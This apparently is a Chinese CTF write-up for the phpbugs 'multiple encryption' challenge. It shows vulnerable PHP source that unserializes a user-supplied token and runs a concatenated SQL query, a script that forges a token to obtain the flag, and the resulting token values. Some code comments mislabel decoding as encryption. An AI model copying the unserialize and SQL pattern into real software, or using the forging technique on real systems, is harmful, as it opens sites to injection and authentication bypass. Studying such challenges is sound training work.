phpbugs多重加密
这题官方给的答案是错的,网上给的也是错的,麻烦别直接拿给的答案来抄好吗?就想纠正一下别误导别人了
源码如下:
<?php
include 'common.php';
$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
//把一个或多个数组合并为一个数组
class db
{
public $where;
function __wakeup()
{
if(!empty($this->where))
{
$this->select($this->where);
}
}
function select($where)
{
$sql = mysql_query('select * from user where '.$where);
//函数执行一条 MySQL 查询。
return @mysql_fetch_array($sql);
//从结果集中取得一行作为关联数组,或数字数组,或二者兼有返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false
}
}
if(isset($requset['token']))
//测试变量是否已经配置。若变量已存在则返回 true 值。其它情形返回 false 值。
{
$login = unserialize(gzuncompress(base64_decode($requset['token'])));
//gzuncompress:进行字符串压缩
//unserialize: 将已序列化的字符串还原回 PHP 的值
$db = new db();
$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
//mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
if($login['user'] === 'ichunqiu')
{
echo $flag;
}else if($row['pass'] !== $login['pass']){
echo 'unserialize injection!!';
}else{
echo "(╯‵□′)╯︵┴─┴ ";
}
}else{
header('Location: index.php?error=1');
}
?>
通读代码逻辑如下:
首先是将GET,POST,SESSION,COOKIE合并为一个数组$request
然后有一个db类,它会判断类中的变量where是否为空,若不为空则调用select方法根据where条件进行查询user表返回一个数组
然后判断$request数组中是否有存在token,若不存在直接返回index.php报错,若存在则先对该值进行base64加密(base64_decode),再进行字符串压缩(gzuncompress),再进行反序列化(unserialize)最后赋值给login
之后取出login中的user作为where条件user=login[user]通过db的select进行查询结果赋值给row
如果login[user]与ichunqiu字符串完全相等则输出flag(成功结果),若row[pass]不等于login[pass]则输出反序列化失败,其他情况则输出一段字符串
需要我们做的其实就是:
反解密ichunqiu,然后提交token就可以了
网上的错误答案:
<?php
$arr = array(['user'] === 'ichunqiu');
$token = base64_encode(gzcompress(serialize($arr)));
print_r($token);
?>
麻烦自己打印下看看真的相等吗
print($arr['user'] === 'ichunqiu');
正确答案:
<?php
$login = array('user' => "ichunqiu");
$token = base64_encode(gzcompress(serialize($login)));
print($token);
echo '</br>';
print($login['user'] === 'ichunqiu');
结果验证:
因为这题代码和数据库没给完整,为了验证结果简化代码如下
<?php
$requset = array_merge($_GET);
$flag = "xxxxxx";
if(isset($requset['token']))
{
$login = unserialize(gzuncompress(base64_decode($requset['token'])));
if($login['user'] === 'ichunqiu')
{
echo $flag;
}else{
echo "(╯‵□′)╯︵┴─┴ ";
}
}else{
header('Location: index.php?error=1');
}
?>
错误答案获得的token
eJxLtDK0qs60MrBOAuJaAB5uBBQ=
正确答案获得的token
eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
![[附源码]Python计算机毕业设计Django基于Java的失物招领平台](https://img-blog.csdnimg.cn/546952b2f3fa4a89b69d461066d34e98.png)
